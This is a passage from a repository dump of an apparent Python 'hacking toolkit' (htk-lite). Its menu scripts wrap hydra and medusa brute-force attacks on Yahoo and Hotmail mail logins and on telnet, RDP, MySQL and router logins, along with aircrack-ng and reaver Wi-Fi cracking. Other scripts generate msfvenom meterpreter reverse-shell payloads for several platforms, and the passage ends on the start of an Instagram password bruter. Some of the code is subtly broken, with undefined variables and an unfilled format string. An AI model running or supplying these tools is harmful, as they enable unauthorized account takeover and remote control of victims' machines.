print " | Telnet Brute Force |" 242 | print " +-------------------------+" 243 | print 244 | print 245 | user = raw_input("[*] User : ") 246 | word = raw_input("[*] Wordlist : ") 247 | iphost = raw_input("[*] IP/Hostname : ") 248 | os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) 249 | sys.exit() 250 | 251 | elif bhydra == '08' or bhydra == '8': 252 | print 253 | print " +---------------------------+" 254 | print " | Yahoo Brute Force |" 255 | print " +---------------------------+" 256 | print 257 | print 258 | email = raw_input("[*] Email : ") 259 | word = raw_input("[*] Wordlist : ") 260 | os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) 261 | sys.exit() 262 | 263 | elif bhydra == '09' or bhydra == '9': 264 | print 265 | print " +----------------------------+" 266 | print " | Hotmail Brute Force |" 267 | print " +----------------------------+" 268 | print 269 | print 270 | email = raw_input("[*] Email : ") 271 | word = raw_input("[*] Wordlist : ") 272 | os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) 273 | sys.exit() 274 | 275 | elif bhydra == '10': 276 | print 277 | print " +-----------------------------+" 278 | print " | Router Speedy Brute Force |" 279 | print " +-----------------------------+" 280 | print 281 | print 282 | user = raw_input("[*] User : ") 283 | word = raw_input("[*] Wordlist : ") 284 | iphost = raw_input("[*] IP/Hostname : ") 285 | os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) 286 | sys.exit() 287 | 288 | elif bhydra == '11': 289 | print 290 | print " +----------------------------+" 291 | print " | RDP Brute Force |" 292 | print " +----------------------------+" 293 | print 294 | print 295 | user = raw_input("[*] User : ") 296 | word = raw_input("[*] Wordlist : ") 297 | iphost = raw_input("[*] IP/Hostname : ") 298 | os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) 299 | sys.exit() 300 | 301 | elif bhydra == '12': 302 | print 303 | print " +-----------------------------+" 304 | print " | MySQL Brute Force |" 305 | print " +-----------------------------+" 306 | print 307 | print 308 | user = raw_input("[*] User : ") 309 | word = raw_input("[*] Wordlist : ") 310 | os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) 311 | 312 | elif bhydra == '00' or bhydra == '0': 313 | print "\n[!] Exit the Program..." 314 | sys.exit() 315 | 316 | else: 317 | print "\n[!] ERROR : Wrong Input" 318 | time.sleep(1) 319 | restart_program() 320 | 321 | def medusa(): 322 | k = raw_input("\033[1mHost:\033[0m ") 323 | u = raw_input("\033[1mUser:\033[0m ") 324 | p = raw_input("\033[1mWordlist:\033[0m ") 325 | os.system("medusa -d") 326 | print "\n" 327 | m = raw_input("\033[1mModule:\033[0m ") 328 | n = raw_input("\033[1mPort:\033[0m ") 329 | a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) 330 | os.system(a) 331 | 332 | def aircrack(): 333 | b = raw_input(G+"\033[1mBSSID: \033[0m") 334 | e = raw_input(G+"\033[1mESSID: \033[0m") 335 | w = raw_input(G+"\033[1mWordlist: \033[0m") 336 | h = raw_input(G+"\033[1mHandshake file: \033[0m") 337 | os.system("iwconfig") 338 | i = raw_input(G+"\033[1mInterface: \033[0m") 339 | os.system("airmon-ng start" + i) 340 | a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' 341 | os.system(a) 342 | os.system("airmon-ng stop" + i) 343 | 344 | def reaver(): 345 | os.system("iwconfig") 346 | j = raw_input("\033[1mSelect Interface:\033[0m ") 347 | k = raw_input("\033[1mEnter BSSID:\033[0m ") 348 | a = 'reaver -i {0} -b {1} -vv'.format(j,k) 349 | os.system(a) 350 | 351 | def password(): 352 | print """ 353 | {0}1: gmail 354 | {1}2: instagram 355 | {2}3: facebook 356 | {3}4: hydra 357 | {4}5: medusa 358 | {5}6: aircrack-ng 359 | {6}7: reaver 360 | \033[0m 361 | go back: go to main menu 362 | """.format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) 363 | try: 364 | choice = raw_input("\033[1mAttack:\033[0m ") 365 | if choice == "1": 366 | gmail() 367 | if choice == "2": 368 | insta() 369 | if choice == "3": 370 | fb() 371 | if choice == "4": 372 | blackhydra() 373 | if choice == "5": 374 | medusa() 375 | if choice == "6": 376 | aircrack() 377 | if choice == "7": 378 | reaver() 379 | if choice == "go back": 380 | os.system("") 381 | 382 | except: 383 | print "\n" 384 | 385 | password() 386 | -------------------------------------------------------------------------------- /commandlist/payload.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def payload(): 41 | print """\033[0m033[1m 42 | Payloads Available:\033[0m 43 | 44 | {0}1: windows/meterpreter/reverse_tcp 45 | 46 | {1}2: android/meterpreter/reverse_tcp 47 | 48 | {2}3: php/meterpreter/reverse_tcp 49 | 50 | {3}4: python/meterpreter/reverse_tcp 51 | 52 | {4}5: ruby/shell_reverse_tcp 53 | 54 | {5}6: osx/x86/vforkshell/reverse_tcp 55 | 56 | {6}7: linux/aarch64/meterpreter/reverse_tcp 57 | 58 | \033[0m""".format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) 59 | choice = raw_input("Payload: ") 60 | lhost = raw_input("LHOST: ") 61 | lport = raw_input("LPORT: ") 62 | name = raw_input("Filename: ") 63 | if choice == "1": 64 | payload = 'msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.exe'.format(lhost, lport, name) 65 | os.system(payload) 66 | if choice == "2": 67 | payload = 'msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.apk'.format(lhost, lport, name) 68 | os.system(payload) 69 | if choice == "3": 70 | payload = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost, lport, name) 71 | os.system(payload) 72 | if choice == "4": 73 | payload = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost, lport, name) 74 | os.system(payload) 75 | if choice == "5": 76 | payload = 'msfvenom -p ruby/shell_reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.rb'.format(lhost, lport, name) 77 | os.system(payload) 78 | if choice == "6": 79 | payload = 'msfvenom -p osx/x86/vforkshell/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.app'.format(lhost, lport, name) 80 | os.system(payload) 81 | if choice == "7": 82 | payload = 'msfvenom -p linux/aarch64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.tar'.format(lhost, lport, name) 83 | os.system(payload) 84 | payload() 85 | -------------------------------------------------------------------------------- /commandlist/reboot.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def reboot(): 41 | python = sys.executable 42 | os.execl(python, python, * sys.argv) 43 | curdir = os.getcwd() 44 | reboot() 45 | -------------------------------------------------------------------------------- /commandlist/sysinfo.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def sysinfo(): 41 | os.system("iwconfig") 42 | k = raw_input("\033[1mInterface:\033[0m ") 43 | os.system("clear") 44 | os.system("ifconfig") 45 | print "\n" 46 | os.system("iwconfig") 47 | print "\n" 48 | os.system("neofetch") 49 | print "\n" 50 | gw = os.popen("ip -4 route show default").read().split() 51 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 52 | s.connect((gw[2], 0)) 53 | ipaddr = s.getsockname()[0] 54 | gateway = gw[2] 55 | host = socket.gethostname() 56 | print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) 57 | print "\n Router IP" 58 | print "----------------------------\033[92m" 59 | os.system('curl "http://myexternalip.com/raw"') 60 | print "\n\033[0m----------------------------" 61 | print "\n" 62 | show = 'macchanger -s {0}'.format(k) 63 | os.system(show) 64 | os.system("uname -a") 65 | os.system("whoami") 66 | sysinfo() 67 | -------------------------------------------------------------------------------- /commandlist/terminal.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def terminal(): 41 | os.system("gnome-terminal") 42 | 43 | terminal() 44 | -------------------------------------------------------------------------------- /commandlist/traff.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def traff(): 41 | os.system("iwconfig") 42 | s = raw_input("\033[1mSelect Interface:\033[0m ") 43 | os.system("tcpdump -i " + s) 44 | traff() 45 | -------------------------------------------------------------------------------- /commandlist/verscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def verscan(): 41 | print """ 42 | Services available: 43 | 44 | {0}ssh 45 | 46 | {1}mysql 47 | \033[0m 48 | """.format(random.choice(colorlist), random.choice(colorlist)) 49 | try: 50 | service = raw_input("\033[1mService: \033[0m") 51 | if service == "ssh": 52 | f = raw_input(G+"\033[1mTarget: \033[0m") 53 | g = raw_input(G+"\033[1mPort: \033[0m") 54 | t = raw_input(G+"\033[1mThreads: \033[0m") 55 | b = raw_input(G+"\033[1mTimeout: \033[0m") 56 | os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') 57 | os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) 58 | os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) 59 | os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) 60 | os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) 61 | os.system('echo "show options\n" >> sshver.rc') 62 | os.system('echo "run\n" >> sshver.rc') 63 | os.system('echo "exit\n" >> sshver.rc') 64 | os.system("service postgresql restart") 65 | os.system('msfconsole -q -r sshver.rc') 66 | os.system('rm -rf sshver.rc') 67 | 68 | if service == "mysql": 69 | f = raw_input(G+"\033[1mTarget: \033[0m") 70 | g = raw_input(G+"\033[1mPort: \033[0m") 71 | t = raw_input(G+"\033[1mThreads: \033[0m") 72 | os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') 73 | os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) 74 | os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) 75 | os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) 76 | os.system('echo "show options\n" >> mysqlv.rc') 77 | os.system('echo "run\n" >> mysqlv.rc') 78 | os.system('echo "exit\n" >> mysqlv.rc') 79 | os.system("service postgresql restart") 80 | os.system('msfconsole -q -r mysqlv.rc') 81 | os.system('rm -rf mysqlv.rc') 82 | except: 83 | print "\n" 84 | verscan() 85 | -------------------------------------------------------------------------------- /commandlist/wordlist.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def wordlist(): 41 | os.system("cd wordlists && cupp -i") 42 | print Y+"wordlist saved to /root/htk-lite/wordlists \033[0m" 43 | 44 | wordlist() 45 | -------------------------------------------------------------------------------- /files/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unkn0wnh4ckr/htk-lite/447b3725451665e8956fc7bcf4607746f5b38547/files/1.png -------------------------------------------------------------------------------- /files/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unkn0wnh4ckr/htk-lite/447b3725451665e8956fc7bcf4607746f5b38547/files/2.png -------------------------------------------------------------------------------- /files/Instagram/Executable/instagram.py: -------------------------------------------------------------------------------- 1 | # Date: 12/29/2018 2 | # Author: Mohamed 3 | # Description: Instagram bruter 4 | 5 | from sys import exit 6 | from os.path import exists 7 | from lib.bruter import Bruter 8 | from lib.display import Display 9 | from lib.const import credentials, modes 10 | 11 | 12 | class Engine(object): 13 | 14 | def __init__(self, username, threads, passlist_path): 15 | self.bruter = None 16 | self.resume = False 17 | self.is_alive = True 18 | self.threads = threads 19 | self.username = username 20 | self.display = Display() 21 | self.passlist_path = passlist_path 22 | 23 | def create_bruter(self): 24 | self.bruter = Bruter(self.username, self.threads, 25 | self.passlist_path) 26 | 27 | def get_user_resp(self): 28 | return self.display.prompt('Would you like to resume the attack? [y/n]: ') 29 | 30 | def write_to_file(self, password): 31 | with open(credentials, 'at') as f: 32 | data = 'Username: {}\nPassword: {}\n\n'.format( 33 | self.username.title(), password) 34 | f.write(data) 35 | 36 | def start(self): 37 | 38 | self.create_bruter() 39 | 40 | while self.is_alive and not self.bruter.password_manager.session: 41 | pass 42 | 43 | if not self.is_alive: 44 | return 45 | 46 | if self.bruter.password_manager.session.exists: 47 | try: 48 | resp = self.get_user_resp() 49 | except: 50 | self.is_alive = False 51 | 52 | if resp and self.is_alive: 53 | if resp.strip().lower() == 'y': 54 | self.bruter.password_manager.resume = True 55 | 56 | try: 57 | self.bruter.start() 58 | except KeyboardInterrupt: 59 | self.bruter.stop() 60 | self.bruter.display.shutdown(self.bruter.last_password, 61 | self.bruter.password_manager.attempts, len(self.bruter.browsers)) 62 | finally: 63 | self.stop() 64 | 65 | def stop(self): 66 | if self.is_alive: 67 | 68 | self.bruter.stop() 69 | self.is_alive = False 70 | 71 | if self.bruter.password_manager.is_read and not self.bruter.is_found and not self.bruter.password_manager.list_size: 72 | self.bruter.display.stats_not_found(self.bruter.last_password, 73 | self.bruter.password_manager.attempts, len(self.bruter.browsers)) 74 | 75 | if self.bruter.is_found: 76 | self.write_to_file(self.bruter.password) 77 | self.bruter.display.stats_found(self.bruter.password, 78 | self.bruter.password_manager.attempts, len(self.bruter.browsers)) 79 | 80 | 81 | def args(): 82 | enable_colors = str(input('Enable colors? (default: y) [y/n]: ')) 83 | 84 | if not enable_colors: 85 | enable_colors = True 86 | else: 87 | if enable_colors[0].lower() == 'n': 88 | enable_colors = False 89 | 90 | display = Display(is_color=enable_colors) 91 | username = display.prompt('Enter a username: ') 92 | 93 | if not username: 94 | display.warning('You can\'t leave this field empty') 95 | display.wait() 96 | exit() 97 | 98 | passlist = display.prompt('Enter the path to your password list: ') 99 | 100 | if not exists(passlist): 101 | display.warning('Invalid path to password list', False) 102 | display.wait() 103 | exit() 104 | 105 | display.info('''Modes:\r 106 | 0: => 512 passwords at a time 107 | 1: => 256 passwords at a time 108 | 2: => 128 passwords at a time 109 | 3: => 64 passwords at a time 110 | ''', False) 111 | 112 | mode = display.prompt('Select a mode [0, 1, 2, 3]: ', False) 113 | 114 | if not mode.isdigit(): 115 | display.warning('Mode must be a number', False) 116 | display.wait() 117 | exit() 118 | 119 | mode = int(mode) 120 | 121 | if int(mode) > 3: 122 | display.warning('Mode must be no more than 3', False) 123 | display.wait() 124 | exit() 125 | 126 | if int(mode) < 0: 127 | display.warning('Mode must bot no less than 0', False) 128 | display.wait() 129 | exit() 130 | 131 | return [username, passlist, mode] 132 | 133 | 134 | if __name__ == '__main__': 135 | try: 136 | user_input = args() 137 | except KeyboardInterrupt: 138 | exit() 139 | 140 | display = Display() 141 | username, passlist, mode = user_input 142 | 143 | try: 144 | Engine(username, modes[mode], passlist).start() 145 | except: 146 | pass 147 | finally: 148 | display.wait() 149 | exit() 150 | -------------------------------------------------------------------------------- /files/Instagram/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 Mohamed 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /files/Instagram/README.md: -------------------------------------------------------------------------------- 1 | # Instagram Bruter 2 | 3 | [![Version](https://img.shields.io/badge/version-v2.1.1-blue.svg)]() 4 | [![Python](https://img.shields.io/badge/python-v3-blue.svg)]() 5 | [![Discord](https://img.shields.io/discord/532621311017484307.svg)](https://discord.gg/jvhJMeb) 6 | [![Donate](https://img.shields.io/badge/paypal-donate-yellow.svg)](https://www.paypal.me/Msheikh03) 7 |
8 | **Bitcoin wallet:** 3Kr5C9t9HWwPfqzSNXeBNyRvJWw9sSLeKy 9 |
